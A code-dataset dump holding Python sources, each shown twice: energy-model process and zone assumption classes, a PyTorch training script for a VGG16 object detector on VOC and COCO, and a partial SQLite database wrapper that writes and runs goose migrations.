code stringlengths 2k 1.04M | repo_path stringlengths 5 517 | parsed_code stringlengths 0 1.04M | quality_prob float64 0.02 0.95 | learning_prob float64 0.02 0.93 |
|---|---|---|---|---|
from numpy import zeros
#------------ technology/process -------------
# basic process definition at country level
class ProcessAssump:
    """Technology/process assumption container.

    Instances are created at both country and zone level: country-level
    objects hold the general assumption set, zone-level objects inherit
    from them. Renewable options are split by capacity-factor (CF) class,
    so the same sProcessName may appear with different iCFClass values.
    Zonal modelling results are also stored on this class.
    """
    def __init__(self, **kwargs):
        n_year = int(kwargs["iYS"])  # number of modelled year steps

        # --- identity / classification ---
        self.sProcessName = str(kwargs["ProcessName"])
        self.sProcessType = str(kwargs["ProcessType"])
        self.sProcessFullName = str(kwargs["ProcessFullName"])
        self.sFuel = str(kwargs["Fuel"])
        self.sOperationMode = str(kwargs["OperationMode"])  # Dispatch, NonDispatch, Storage
        self.bCCS = int(kwargs["CCS"])
        self.bAS_T1 = int(kwargs["AS_T1"])
        self.bAS_T2 = int(kwargs["AS_T2"])
        self.bAS_T3 = int(kwargs["AS_T3"])

        # --- technical assumptions per year step (country level) ---
        self.iUnitCapacity = 0                   # MW
        self.fGrossEff_YS = zeros(n_year)        # 0-1
        self.fMinLoad_YS = zeros(n_year)         # 0-1
        self.fRampRate_YS = zeros(n_year)        # %P/Min
        self.fEquAvailFactor_YS = zeros(n_year)  # 0-1; renewables' CF already accounts for availability
        self.fAuxiliaryCon_YS = zeros(n_year)    # 0-1, own use
        self.fCaptureRate_YS = zeros(n_year)     # 0-1, for CCS
        self.fDuration_YS = zeros(n_year)        # hours, for storage

        # --- cost assumptions per year step (country level) ---
        self.fCAPEX_YS = zeros(n_year)           # USD/kW
        self.fOPEX_YS = zeros(n_year)            # USD/kW
        self.fVarOPEX_YS = zeros(n_year)         # USD/kWh
        self.fLifetime = 0                       # years
        self.fVarOM = 0                          # USD/kWh
        self.fDiscount = 0.05                    # 0-1, default discount rate
        self.fAnnualCapex = zeros(n_year)        # M.USD / yr.MW
        self.fAnnualFixedCost = zeros(n_year)    # M.USD / yr.MW

        # --- fixed new build of dispatchable units (country level) ---
        self.dicProcDispFixedNewBuild = {}       # MW

        # --- renewable/storage extras: zonal capacity and limits by CF class ---
        self.iCFClass = 0
        self.fREDevLimit = 0      # MW, overall capacity development limit
        self.fREExistCap = 0      # MW, capacity of existing units
        self.fPVLandLimit = 0     # km2, available area for all solar tech
        self.fRECF_TS = []        # 0-1, CF for dispatch operation
        self.fRECF_CEP = []      # 0-1, CF for capacity expansion
        self.fRECF_CEP_RT = []   # 0-1, CF for extreme-case tests in CE, updated each period
        self.fRECF_8760 = []     # 0-1, original annual hourly CF data
        self.fBaseDispCF_288 = None  # 0-1, base dispatch CF profile (288 slices per name -- TODO confirm)

        # --- modelling results ---
        self.dicProcNewBuild_YS = {}     # MW
        self.dicProcAccCapacity_YS = {}  # MW
# technical assumption for the process in a zone
class ZoneProcess():
    """Technical assumptions for a single process unit within a zone."""
    def __init__(self, **kwargs):
        # --- identity ---
        self.sCompany = ""
        self.iZoneProcAssumIndex = 0
        self.sProcessName = str(kwargs["sProcessName"])
        self.sProcessID = str(kwargs["sProcessID"])
        self.sProcessType = ""
        self.sFuel = ""
        self.sOperationMode = ""
        self.bCCS = 0
        # operation status time series; 0: shutdown, 1: generating, 2: committed
        self.iOperatoinStatus_TS_YS = None
        # --- technical parameters ---
        self.iCapacity = 0        # MW
        self.fGrossEff = 0        # 0-1
        self.fMinLoad = 0         # 0-1
        self.fRampRate = 0        # %P/Min
        self.fEquAvailFactor = 0  # 0-1
        self.fAuxiliaryCon = 0    # 0-1, own use
        self.fCaptureRate = 0     # 0-1
        self.fDuration = 0        # hours
        self.iCommitTime = 0      # year
        self.iDeCommitTime = 0    # year
        self.iCFClass = 0
        # ---- derived assumptions (assigned elsewhere) ----
        # fDeratedCapacity (MW)
        # fAnnualCapex (M.USD / yr)
        # fAnnualFixedCost (M.USD / yr)
        # fvarOMCost (USD/kWh)
        # iCFClass: CF tranche class for renewables
        # fASMax_T1 / fASMax_T2 / fASMax_T3: MW, max capacity per ancillary-service tier
from numpy import zeros
#------------ technology/process -------------
# basic process definition at country level
class ProcessAssump:
    """Technology/process assumption container.

    Instances are created at both country and zone level: country-level
    objects hold the general assumption set, zone-level objects inherit
    from them. Renewable options are split by capacity-factor (CF) class,
    so the same sProcessName may appear with different iCFClass values.
    Zonal modelling results are also stored on this class.
    """
    def __init__(self, **kwargs):
        n_year = int(kwargs["iYS"])  # number of modelled year steps

        # --- identity / classification ---
        self.sProcessName = str(kwargs["ProcessName"])
        self.sProcessType = str(kwargs["ProcessType"])
        self.sProcessFullName = str(kwargs["ProcessFullName"])
        self.sFuel = str(kwargs["Fuel"])
        self.sOperationMode = str(kwargs["OperationMode"])  # Dispatch, NonDispatch, Storage
        self.bCCS = int(kwargs["CCS"])
        self.bAS_T1 = int(kwargs["AS_T1"])
        self.bAS_T2 = int(kwargs["AS_T2"])
        self.bAS_T3 = int(kwargs["AS_T3"])

        # --- technical assumptions per year step (country level) ---
        self.iUnitCapacity = 0                   # MW
        self.fGrossEff_YS = zeros(n_year)        # 0-1
        self.fMinLoad_YS = zeros(n_year)         # 0-1
        self.fRampRate_YS = zeros(n_year)        # %P/Min
        self.fEquAvailFactor_YS = zeros(n_year)  # 0-1; renewables' CF already accounts for availability
        self.fAuxiliaryCon_YS = zeros(n_year)    # 0-1, own use
        self.fCaptureRate_YS = zeros(n_year)     # 0-1, for CCS
        self.fDuration_YS = zeros(n_year)        # hours, for storage

        # --- cost assumptions per year step (country level) ---
        self.fCAPEX_YS = zeros(n_year)           # USD/kW
        self.fOPEX_YS = zeros(n_year)            # USD/kW
        self.fVarOPEX_YS = zeros(n_year)         # USD/kWh
        self.fLifetime = 0                       # years
        self.fVarOM = 0                          # USD/kWh
        self.fDiscount = 0.05                    # 0-1, default discount rate
        self.fAnnualCapex = zeros(n_year)        # M.USD / yr.MW
        self.fAnnualFixedCost = zeros(n_year)    # M.USD / yr.MW

        # --- fixed new build of dispatchable units (country level) ---
        self.dicProcDispFixedNewBuild = {}       # MW

        # --- renewable/storage extras: zonal capacity and limits by CF class ---
        self.iCFClass = 0
        self.fREDevLimit = 0      # MW, overall capacity development limit
        self.fREExistCap = 0      # MW, capacity of existing units
        self.fPVLandLimit = 0     # km2, available area for all solar tech
        self.fRECF_TS = []        # 0-1, CF for dispatch operation
        self.fRECF_CEP = []      # 0-1, CF for capacity expansion
        self.fRECF_CEP_RT = []   # 0-1, CF for extreme-case tests in CE, updated each period
        self.fRECF_8760 = []     # 0-1, original annual hourly CF data
        self.fBaseDispCF_288 = None  # 0-1, base dispatch CF profile (288 slices per name -- TODO confirm)

        # --- modelling results ---
        self.dicProcNewBuild_YS = {}     # MW
        self.dicProcAccCapacity_YS = {}  # MW
# technical assumption for the process in a zone
class ZoneProcess():
    """Technical assumptions for a single process unit within a zone."""
    def __init__(self, **kwargs):
        # --- identity ---
        self.sCompany = ""
        self.iZoneProcAssumIndex = 0
        self.sProcessName = str(kwargs["sProcessName"])
        self.sProcessID = str(kwargs["sProcessID"])
        self.sProcessType = ""
        self.sFuel = ""
        self.sOperationMode = ""
        self.bCCS = 0
        # operation status time series; 0: shutdown, 1: generating, 2: committed
        self.iOperatoinStatus_TS_YS = None
        # --- technical parameters ---
        self.iCapacity = 0        # MW
        self.fGrossEff = 0        # 0-1
        self.fMinLoad = 0         # 0-1
        self.fRampRate = 0        # %P/Min
        self.fEquAvailFactor = 0  # 0-1
        self.fAuxiliaryCon = 0    # 0-1, own use
        self.fCaptureRate = 0     # 0-1
        self.fDuration = 0        # hours
        self.iCommitTime = 0      # year
        self.iDeCommitTime = 0    # year
        self.iCFClass = 0
        # ---- derived assumptions (assigned elsewhere) ----
        # fDeratedCapacity (MW)
        # fAnnualCapex (M.USD / yr)
        # fAnnualFixedCost (M.USD / yr)
        # fvarOMCost (USD/kWh)
        # iCFClass: CF tranche class for renewables
        # fASMax_T1 / fASMax_T2 / fASMax_T3: MW, max capacity per ancillary-service tier
import os
import numpy as np
import argparse
import time
import torch
from utils.net_utils import adjust_learning_rate, save_checkpoint, clip_gradient, calc_grad_norm
from utils.box_utils import sample_proposals
from model.dc_vgg16 import DC_VGG16_DET, DC_VGG16_CLS
from datasets.tdet_dataset import TDETDataset
from matplotlib import pyplot as plt
import torch.nn.functional as F
import math
def parse_args():
    """Build and parse the command-line arguments for training."""
    ap = argparse.ArgumentParser(description='Train')
    ap.add_argument('--net', default='DC_VGG16_DET', type=str)
    ap.add_argument('--start_iter', help='starting iteration', default=1, type=int)
    ap.add_argument('--max_iter', help='number of iterations', default=70000, type=int)
    ap.add_argument('--disp_interval', help='number of iterations to display loss', default=1000, type=int)
    ap.add_argument('--save_interval', dest='save_interval', help='number of iterations to save',
                    default=10000, type=int)
    ap.add_argument('--save_dir', help='directory to save models', default="../repo/tdet")
    ap.add_argument('--data_dir', help='directory to load data', default='../data', type=str)
    ap.add_argument('--pooling_method', help='roi_pooling or roi_align', default='roi_pooling', type=str)
    ap.add_argument('--prop_method', help='ss, eb, or mcg', default='eb', type=str)
    ap.add_argument('--prop_min_scale', help='minimum proposal box size', default=20, type=int)
    ap.add_argument('--num_prop', help='maximum number of proposals to use for training',
                    default=2000, type=int)
    ap.add_argument('--bs', help='training batch size', default=128, type=int)
    ap.add_argument('--pos_ratio', help='ratio of positive roi', default=0.25, type=float)
    ap.add_argument('--lr', help='starting learning rate', default=0.001, type=float)
    ap.add_argument('--s', dest='session', help='training session', default=0, type=int)
    ap.add_argument('--seed', help='random sed', default=1, type=int)
    ap.add_argument('--target_only', action='store_true')
    ap.add_argument('--pretrained_base_path', type=str)
    return ap.parse_args()
def draw_box(boxes, col=None):
    """Draw each (xmin, ymin, xmax, ymax) box on the current pyplot axes.

    If col is None a fresh random colour is drawn per box, otherwise col
    is used for all boxes.
    """
    for xmin, ymin, xmax, ymax in boxes:
        c = np.random.rand(3) if col is None else col
        plt.hlines(ymin, xmin, xmax, colors=c, lw=2)
        plt.hlines(ymax, xmin, xmax, colors=c, lw=2)
        plt.vlines(xmin, ymin, ymax, colors=c, lw=2)
        plt.vlines(xmax, ymin, ymax, colors=c, lw=2)
def validate(model, val_dataset, args, device):
    """Run a quick validation pass and print the mean per-image loss.

    For each image, two of its ground-truth classes are sampled (with
    replacement, via np.random.choice) and the model loss is averaged
    over them. The model is restored to train mode before returning.
    """
    model.eval()
    tot_loss = 0
    # BUGFIX: validation never backpropagates, so run under no_grad to
    # avoid building autograd graphs (saves memory/time; losses are
    # consumed via .item() only).
    with torch.no_grad():
        for step in range(len(val_dataset)):
            batch = val_dataset.get_data(step, h_flip=False, target_im_size=688)
            im_data = batch['im_data'].unsqueeze(0).to(device)
            proposals = batch['proposals']
            gt_boxes = batch['gt_boxes']
            gt_labels = batch['gt_labels']
            # classes present in this image (20 VOC target classes)
            pos_cls = [i for i in range(20) if i in gt_labels]
            loss = 0
            for cls in np.random.choice(pos_cls, 2):
                indices = np.where(gt_labels.numpy() == cls)[0]
                here_gt_boxes = gt_boxes[indices]
                here_proposals, here_labels, _, pos_cnt, neg_cnt = sample_proposals(
                    here_gt_boxes, proposals, args.bs // 2, args.pos_ratio)
                here_proposals = here_proposals.to(device)
                here_labels = here_labels.to(device)
                here_loss = model(im_data, cls, here_proposals, here_labels)
                loss = loss + here_loss.item()
            loss /= 2
            tot_loss += loss
    model.train()
    print('Validation loss: %.4f' % (tot_loss / len(val_dataset)))
def train():
    """Main training loop.

    Parses args, seeds RNGs, builds the source training dataset (VOC when
    --target_only, else COCO-60) and the VOC07 validation dataset, loads a
    pretrained classification base into DC_VGG16_DET, and optimizes.
    Logs every disp_interval iterations, steps the LR down 10x at 4/7 and
    6/7 of max_iter, and validates + checkpoints every save_interval.
    """
    args = parse_args()
    print('Called with args:')
    print(args)

    np.random.seed(args.seed)
    torch.manual_seed(args.seed)
    if torch.cuda.is_available():
        torch.cuda.manual_seed(args.seed)
        device = torch.device('cuda')
    else:
        device = torch.device('cpu')

    output_dir = args.save_dir
    if not os.path.exists(output_dir):
        os.makedirs(output_dir)

    if args.target_only:
        source_train_dataset = TDETDataset(['voc07_trainval'], args.data_dir, args.prop_method,
                                           num_classes=20, prop_min_scale=args.prop_min_scale, prop_topk=args.num_prop)
    else:
        source_train_dataset = TDETDataset(['coco60_train2014', 'coco60_val2014'], args.data_dir, args.prop_method,
                                           num_classes=60, prop_min_scale=args.prop_min_scale, prop_topk=args.num_prop)
    target_val_dataset = TDETDataset(['voc07_test'], args.data_dir, args.prop_method,
                                     num_classes=20, prop_min_scale=args.prop_min_scale, prop_topk=args.num_prop)

    lr = args.lr
    if args.net == 'DC_VGG16_DET':
        base_model = DC_VGG16_CLS(None, 20 if args.target_only else 80, 3, 4)
        checkpoint = torch.load(args.pretrained_base_path)
        base_model.load_state_dict(checkpoint['model'])
        del checkpoint
        model = DC_VGG16_DET(base_model, args.pooling_method)
    optimizer = model.get_optimizer(args.lr)

    log_file_name = os.path.join(output_dir, 'log_{}_{}.txt'.format(args.net, args.session))
    log_file = open(log_file_name, 'w')
    log_file.write(str(args))
    log_file.write('\n')

    model.to(device)
    model.train()

    source_loss_sum = 0
    source_pos_prop_sum = 0
    source_neg_prop_sum = 0
    start = time.time()
    optimizer.zero_grad()

    # BUGFIX: the permutation used to be created only when
    # step % len(dataset) == 1, so resuming with a --start_iter that does
    # not satisfy that condition raised NameError. Lazy-init keeps the RNG
    # stream identical to the original for fresh runs.
    source_rand_perm = None
    for step in range(args.start_iter, args.max_iter + 1):
        # reshuffle once per "epoch" (and on the first iteration of a resume)
        if source_rand_perm is None or step % len(source_train_dataset) == 1:
            source_rand_perm = np.random.permutation(len(source_train_dataset))
        source_index = source_rand_perm[step % len(source_train_dataset)]
        source_batch = source_train_dataset.get_data(source_index, h_flip=np.random.rand() > 0.5, target_im_size=np.random.choice([480, 576, 688, 864, 1200]))

        source_im_data = source_batch['im_data'].unsqueeze(0).to(device)
        source_proposals = source_batch['proposals']
        source_gt_boxes = source_batch['gt_boxes']
        if args.target_only:
            source_gt_labels = source_batch['gt_labels']
        else:
            # COCO-60 labels are shifted past the 20 VOC target classes
            source_gt_labels = source_batch['gt_labels'] + 20
        source_pos_cls = [i for i in range(80) if i in source_gt_labels]

        source_loss = 0
        # sample two ground-truth classes (with replacement) per image
        for cls in np.random.choice(source_pos_cls, 2):
            indices = np.where(source_gt_labels.numpy() == cls)[0]
            here_gt_boxes = source_gt_boxes[indices]
            here_proposals, here_labels, _, pos_cnt, neg_cnt = sample_proposals(here_gt_boxes, source_proposals, args.bs // 2, args.pos_ratio)
            # plt.imshow(source_batch['raw_img'])
            # draw_box(here_proposals[:pos_cnt] / source_batch['im_scale'], 'black')
            # draw_box(here_proposals[pos_cnt:] / source_batch['im_scale'], 'yellow')
            # plt.show()
            here_proposals = here_proposals.to(device)
            here_labels = here_labels.to(device)

            here_loss = model(source_im_data, cls, here_proposals, here_labels)
            source_loss = source_loss + here_loss
            source_pos_prop_sum += pos_cnt
            source_neg_prop_sum += neg_cnt

        source_loss = source_loss / 2
        source_loss_sum += source_loss.item()
        source_loss.backward()
        clip_gradient(model, 10.0)
        optimizer.step()
        optimizer.zero_grad()

        if step % args.disp_interval == 0:
            end = time.time()
            source_loss_sum /= args.disp_interval
            source_pos_prop_sum /= args.disp_interval
            source_neg_prop_sum /= args.disp_interval
            log_message = "[%s][session %d][iter %4d] loss: %.4f, pos_prop: %.1f, neg_prop: %.1f, lr: %.2e, time: %.1f" % \
                          (args.net, args.session, step, source_loss_sum, source_pos_prop_sum, source_neg_prop_sum, lr, end - start)
            print(log_message)
            log_file.write(log_message + '\n')
            log_file.flush()

            source_loss_sum = 0
            source_pos_prop_sum = 0
            source_neg_prop_sum = 0
            start = time.time()

        # LR schedule: decay 10x at 4/7 and 6/7 of the total iterations
        if step in (args.max_iter * 4 // 7, args.max_iter * 6 // 7):
            adjust_learning_rate(optimizer, 0.1)
            lr *= 0.1

        if step % args.save_interval == 0 or step == args.max_iter:
            validate(model, target_val_dataset, args, device)
            save_name = os.path.join(output_dir, '{}_{}_{}.pth'.format(args.net, args.session, step))
            checkpoint = dict()
            checkpoint['net'] = args.net
            checkpoint['session'] = args.session
            checkpoint['pooling_method'] = args.pooling_method
            checkpoint['iterations'] = step
            checkpoint['model'] = model.state_dict()
            save_checkpoint(checkpoint, save_name)
            print('save model: {}'.format(save_name))

    log_file.close()
# Script entry point. (Table-extraction residue that had been fused onto
# this line was removed; it broke the file's syntax.)
if __name__ == '__main__':
    train()
import numpy as np
import argparse
import time
import torch
from utils.net_utils import adjust_learning_rate, save_checkpoint, clip_gradient, calc_grad_norm
from utils.box_utils import sample_proposals
from model.dc_vgg16 import DC_VGG16_DET, DC_VGG16_CLS
from datasets.tdet_dataset import TDETDataset
from matplotlib import pyplot as plt
import torch.nn.functional as F
import math
def parse_args():
    """Build and parse the command-line arguments for training."""
    ap = argparse.ArgumentParser(description='Train')
    ap.add_argument('--net', default='DC_VGG16_DET', type=str)
    ap.add_argument('--start_iter', help='starting iteration', default=1, type=int)
    ap.add_argument('--max_iter', help='number of iterations', default=70000, type=int)
    ap.add_argument('--disp_interval', help='number of iterations to display loss', default=1000, type=int)
    ap.add_argument('--save_interval', dest='save_interval', help='number of iterations to save',
                    default=10000, type=int)
    ap.add_argument('--save_dir', help='directory to save models', default="../repo/tdet")
    ap.add_argument('--data_dir', help='directory to load data', default='../data', type=str)
    ap.add_argument('--pooling_method', help='roi_pooling or roi_align', default='roi_pooling', type=str)
    ap.add_argument('--prop_method', help='ss, eb, or mcg', default='eb', type=str)
    ap.add_argument('--prop_min_scale', help='minimum proposal box size', default=20, type=int)
    ap.add_argument('--num_prop', help='maximum number of proposals to use for training',
                    default=2000, type=int)
    ap.add_argument('--bs', help='training batch size', default=128, type=int)
    ap.add_argument('--pos_ratio', help='ratio of positive roi', default=0.25, type=float)
    ap.add_argument('--lr', help='starting learning rate', default=0.001, type=float)
    ap.add_argument('--s', dest='session', help='training session', default=0, type=int)
    ap.add_argument('--seed', help='random sed', default=1, type=int)
    ap.add_argument('--target_only', action='store_true')
    ap.add_argument('--pretrained_base_path', type=str)
    return ap.parse_args()
def draw_box(boxes, col=None):
    """Draw each (xmin, ymin, xmax, ymax) box on the current pyplot axes.

    If col is None a fresh random colour is drawn per box, otherwise col
    is used for all boxes.
    """
    for xmin, ymin, xmax, ymax in boxes:
        c = np.random.rand(3) if col is None else col
        plt.hlines(ymin, xmin, xmax, colors=c, lw=2)
        plt.hlines(ymax, xmin, xmax, colors=c, lw=2)
        plt.vlines(xmin, ymin, ymax, colors=c, lw=2)
        plt.vlines(xmax, ymin, ymax, colors=c, lw=2)
def validate(model, val_dataset, args, device):
    """Run a quick validation pass and print the mean per-image loss.

    For each image, two of its ground-truth classes are sampled (with
    replacement, via np.random.choice) and the model loss is averaged
    over them. The model is restored to train mode before returning.
    """
    model.eval()
    tot_loss = 0
    # BUGFIX: validation never backpropagates, so run under no_grad to
    # avoid building autograd graphs (saves memory/time; losses are
    # consumed via .item() only).
    with torch.no_grad():
        for step in range(len(val_dataset)):
            batch = val_dataset.get_data(step, h_flip=False, target_im_size=688)
            im_data = batch['im_data'].unsqueeze(0).to(device)
            proposals = batch['proposals']
            gt_boxes = batch['gt_boxes']
            gt_labels = batch['gt_labels']
            # classes present in this image (20 VOC target classes)
            pos_cls = [i for i in range(20) if i in gt_labels]
            loss = 0
            for cls in np.random.choice(pos_cls, 2):
                indices = np.where(gt_labels.numpy() == cls)[0]
                here_gt_boxes = gt_boxes[indices]
                here_proposals, here_labels, _, pos_cnt, neg_cnt = sample_proposals(
                    here_gt_boxes, proposals, args.bs // 2, args.pos_ratio)
                here_proposals = here_proposals.to(device)
                here_labels = here_labels.to(device)
                here_loss = model(im_data, cls, here_proposals, here_labels)
                loss = loss + here_loss.item()
            loss /= 2
            tot_loss += loss
    model.train()
    print('Validation loss: %.4f' % (tot_loss / len(val_dataset)))
def train():
    """Main training loop.

    Parses args, seeds RNGs, builds the source training dataset (VOC when
    --target_only, else COCO-60) and the VOC07 validation dataset, loads a
    pretrained classification base into DC_VGG16_DET, and optimizes.
    Logs every disp_interval iterations, steps the LR down 10x at 4/7 and
    6/7 of max_iter, and validates + checkpoints every save_interval.
    """
    args = parse_args()
    print('Called with args:')
    print(args)

    np.random.seed(args.seed)
    torch.manual_seed(args.seed)
    if torch.cuda.is_available():
        torch.cuda.manual_seed(args.seed)
        device = torch.device('cuda')
    else:
        device = torch.device('cpu')

    output_dir = args.save_dir
    if not os.path.exists(output_dir):
        os.makedirs(output_dir)

    if args.target_only:
        source_train_dataset = TDETDataset(['voc07_trainval'], args.data_dir, args.prop_method,
                                           num_classes=20, prop_min_scale=args.prop_min_scale, prop_topk=args.num_prop)
    else:
        source_train_dataset = TDETDataset(['coco60_train2014', 'coco60_val2014'], args.data_dir, args.prop_method,
                                           num_classes=60, prop_min_scale=args.prop_min_scale, prop_topk=args.num_prop)
    target_val_dataset = TDETDataset(['voc07_test'], args.data_dir, args.prop_method,
                                     num_classes=20, prop_min_scale=args.prop_min_scale, prop_topk=args.num_prop)

    lr = args.lr
    if args.net == 'DC_VGG16_DET':
        base_model = DC_VGG16_CLS(None, 20 if args.target_only else 80, 3, 4)
        checkpoint = torch.load(args.pretrained_base_path)
        base_model.load_state_dict(checkpoint['model'])
        del checkpoint
        model = DC_VGG16_DET(base_model, args.pooling_method)
    optimizer = model.get_optimizer(args.lr)

    log_file_name = os.path.join(output_dir, 'log_{}_{}.txt'.format(args.net, args.session))
    log_file = open(log_file_name, 'w')
    log_file.write(str(args))
    log_file.write('\n')

    model.to(device)
    model.train()

    source_loss_sum = 0
    source_pos_prop_sum = 0
    source_neg_prop_sum = 0
    start = time.time()
    optimizer.zero_grad()

    # BUGFIX: the permutation used to be created only when
    # step % len(dataset) == 1, so resuming with a --start_iter that does
    # not satisfy that condition raised NameError. Lazy-init keeps the RNG
    # stream identical to the original for fresh runs.
    source_rand_perm = None
    for step in range(args.start_iter, args.max_iter + 1):
        # reshuffle once per "epoch" (and on the first iteration of a resume)
        if source_rand_perm is None or step % len(source_train_dataset) == 1:
            source_rand_perm = np.random.permutation(len(source_train_dataset))
        source_index = source_rand_perm[step % len(source_train_dataset)]
        source_batch = source_train_dataset.get_data(source_index, h_flip=np.random.rand() > 0.5, target_im_size=np.random.choice([480, 576, 688, 864, 1200]))

        source_im_data = source_batch['im_data'].unsqueeze(0).to(device)
        source_proposals = source_batch['proposals']
        source_gt_boxes = source_batch['gt_boxes']
        if args.target_only:
            source_gt_labels = source_batch['gt_labels']
        else:
            # COCO-60 labels are shifted past the 20 VOC target classes
            source_gt_labels = source_batch['gt_labels'] + 20
        source_pos_cls = [i for i in range(80) if i in source_gt_labels]

        source_loss = 0
        # sample two ground-truth classes (with replacement) per image
        for cls in np.random.choice(source_pos_cls, 2):
            indices = np.where(source_gt_labels.numpy() == cls)[0]
            here_gt_boxes = source_gt_boxes[indices]
            here_proposals, here_labels, _, pos_cnt, neg_cnt = sample_proposals(here_gt_boxes, source_proposals, args.bs // 2, args.pos_ratio)
            # plt.imshow(source_batch['raw_img'])
            # draw_box(here_proposals[:pos_cnt] / source_batch['im_scale'], 'black')
            # draw_box(here_proposals[pos_cnt:] / source_batch['im_scale'], 'yellow')
            # plt.show()
            here_proposals = here_proposals.to(device)
            here_labels = here_labels.to(device)

            here_loss = model(source_im_data, cls, here_proposals, here_labels)
            source_loss = source_loss + here_loss
            source_pos_prop_sum += pos_cnt
            source_neg_prop_sum += neg_cnt

        source_loss = source_loss / 2
        source_loss_sum += source_loss.item()
        source_loss.backward()
        clip_gradient(model, 10.0)
        optimizer.step()
        optimizer.zero_grad()

        if step % args.disp_interval == 0:
            end = time.time()
            source_loss_sum /= args.disp_interval
            source_pos_prop_sum /= args.disp_interval
            source_neg_prop_sum /= args.disp_interval
            log_message = "[%s][session %d][iter %4d] loss: %.4f, pos_prop: %.1f, neg_prop: %.1f, lr: %.2e, time: %.1f" % \
                          (args.net, args.session, step, source_loss_sum, source_pos_prop_sum, source_neg_prop_sum, lr, end - start)
            print(log_message)
            log_file.write(log_message + '\n')
            log_file.flush()

            source_loss_sum = 0
            source_pos_prop_sum = 0
            source_neg_prop_sum = 0
            start = time.time()

        # LR schedule: decay 10x at 4/7 and 6/7 of the total iterations
        if step in (args.max_iter * 4 // 7, args.max_iter * 6 // 7):
            adjust_learning_rate(optimizer, 0.1)
            lr *= 0.1

        if step % args.save_interval == 0 or step == args.max_iter:
            validate(model, target_val_dataset, args, device)
            save_name = os.path.join(output_dir, '{}_{}_{}.pth'.format(args.net, args.session, step))
            checkpoint = dict()
            checkpoint['net'] = args.net
            checkpoint['session'] = args.session
            checkpoint['pooling_method'] = args.pooling_method
            checkpoint['iterations'] = step
            checkpoint['model'] = model.state_dict()
            save_checkpoint(checkpoint, save_name)
            print('save model: {}'.format(save_name))

    log_file.close()
# Script entry point. (Table-extraction residue that had been fused onto
# this line was removed; it broke the file's syntax.)
if __name__ == '__main__':
    train()
import datetime
import dateutil.parser
import os
from path import cd
import simplejson as json
import sqlite3
import subprocess
import sys
import yaml
import log
warn, info, debug, fatal = log.reporters()
class UnsupportedDBType(Exception):
    """Raised when the configured database driver is not one we support."""
    pass
class DBNotFound(Exception):
    """Raised when the target database file does not exist."""
    pass
class DBConn(object):
    """Thin connection wrapper around the LEIE database.

    Reads its configuration from a goose-style dbconf.yml file and, by
    default, opens a sqlite3 connection.
    """
    def __init__(self, db_name="development", db_conf_file="", connect=True):
        """Open a database connection, creating db if needed, and generally
        get ready to store stuff.

        DB_NAME is the name of the database to target from dbconf.yml.

        If DB_CONF_FILE isn't specified, we use a stock one of defaults.
        Goose migrations used dbconf.yml files, so for convenience, we
        just read any needed data from that file.

        If CONNECT is true, we open a db connection.
        """
        self.db_name = db_name
        if os.path.exists(db_conf_file):
            # slurp dbconf.yml
            with open(db_conf_file) as INF:
                # BUGFIX: yaml.load without an explicit Loader is unsafe
                # and raises TypeError on PyYAML >= 6; this is plain config
                # data, so safe_load is the right call.
                self.db_conf = yaml.safe_load(INF)[db_name]
        else:
            info("dbconf.yml not found, using default config values (db will be leie.sqlite3)")
            self.db_name = "development"
            # Same defaults the old inline-YAML string produced, without a
            # round trip through the YAML parser.
            self.db_conf = {"driver": "sqlite3", "open": "leie.sqlite3"}

        # If we're not opening a connection, we're done
        if not connect:
            return

        # open and hang on to a db connection for later use
        if self.db_conf['driver'] == 'sqlite3':
            self.conn = sqlite3.connect(self.db_conf['open'])
        else:
            raise UnsupportedDBType("We don't support databases of type %s" % self.db_conf['driver'])

    def close(self):
        """Commit and close the db connection."""
        self.conn.commit()
        self.conn.close()

    def table_len(self, table):
        """Return the number of total rows in the TABLE.

        TABLE is interpolated into the SQL directly, so it must be a
        trusted internal table name, never user input.
        """
        c = self.conn.cursor()
        return (c.execute("SELECT Count(*) FROM %s" % table).fetchone()[0])

    def row_to_dict(self, row, field=None, description=None):
        """
        FIELD is a list or tuple of field names

        DESCRIPTION is the results of cursor.description from sqlite

        Either FIELD or DESCRIPTION must be present, but not both.

        ROW is a tuple of values

        Returns a dict with the keys taken from FIELD and the values taken from ROW.
        """
        assert field or description
        assert not (field and description)
        if description:
            field = [c[0] for c in description]
        # Normalize sqlite's implicit rowid column to a friendlier 'id' key.
        field = ['id' if f == 'rowid' else f for f in field]
        return dict(zip(field, row))
class SQL(DBConn):
    """All the sql and goose stuff goes in this class.

    We generate the SQL here because in the future I think we might want some
    smart/scripted way to manage sql for different DB types."""

    def down(self, migration):
        """Return schema sql for migrating the db down.

        Specify a MIGRATION, the first being 0 on up to the latest.
        If you specify a migration beyond our total, return None
        (implicitly, by falling off the end).
        """
        if migration == 0:
            return """
    DROP TABLE exclusion;
    DROP TABLE reinstatement;
    """
        if migration == 1:
            return "DROP TABLE log;"

    def goose(self):
        """Return a dict of goose migrations: filename -> file contents.

        Each entry pairs the matching up() and down() sql under the
        standard goose Up/Down markers.
        """
        fnames = ["20170515130501_initial_create.sql"
                  ,"20170606100001_create_log.sql"
        ]
        migrations = {}
        # enumerate instead of range(len(...)): index i feeds up()/down()
        for i, fname in enumerate(fnames):
            migrations[fname] = "-- +goose Up\n" + self.up(i) + "\n-- +goose Down\n" + self.down(i) + "\n"
        return migrations

    def goose_write(self, dirname=None):
        """Write any needed migration files to the migrations directory
        specified by DIRNAME. Leave DIRNAME as None to just use
        ./db as the migrations directory.

        Returns list of paths to created files.
        """
        if not dirname:
            dirname = os.path.join(os.path.dirname(__file__), "db")
        dirname = os.path.join(dirname, self.db_conf['driver'])
        os.makedirs(dirname, exist_ok=True)
        created = []
        for fname, migration in self.goose().items():
            fname = os.path.join(dirname, fname)
            if os.path.exists(fname):
                debug("Migration " +fname+" already exists. Overwriting.")
            created.append(fname)
            info("Writing migration to " + fname)
            with open(fname, 'w') as OUTF:
                OUTF.write(migration)
        return created

    def migrate(self):
        """Bring the db schema up to date by running any needed model
        migrations via the external goose tool.

        Raises DBNotFound if the sqlite file is missing, and
        CalledProcessError if goose reports a failure.
        """
        debug(self.db_conf)
        dirname = os.path.dirname(self.db_conf['open'])
        if not dirname:
            dirname = os.path.dirname(__file__)
        with cd(dirname):
            # Make sure the sqlite3 db exists before we try to migrate it
            if not os.path.exists(os.path.basename(self.db_conf['open'])):
                raise DBNotFound("DB %s doesn't exist, so we can't migrate it." % self.db_conf['open'])

            # Goose apparently returns 0 even when it errors, so we
            # have to check stderr and react accordingly.
            # NOTE: shell=True with a command assembled from our own config;
            # do not feed untrusted values into db_conf.
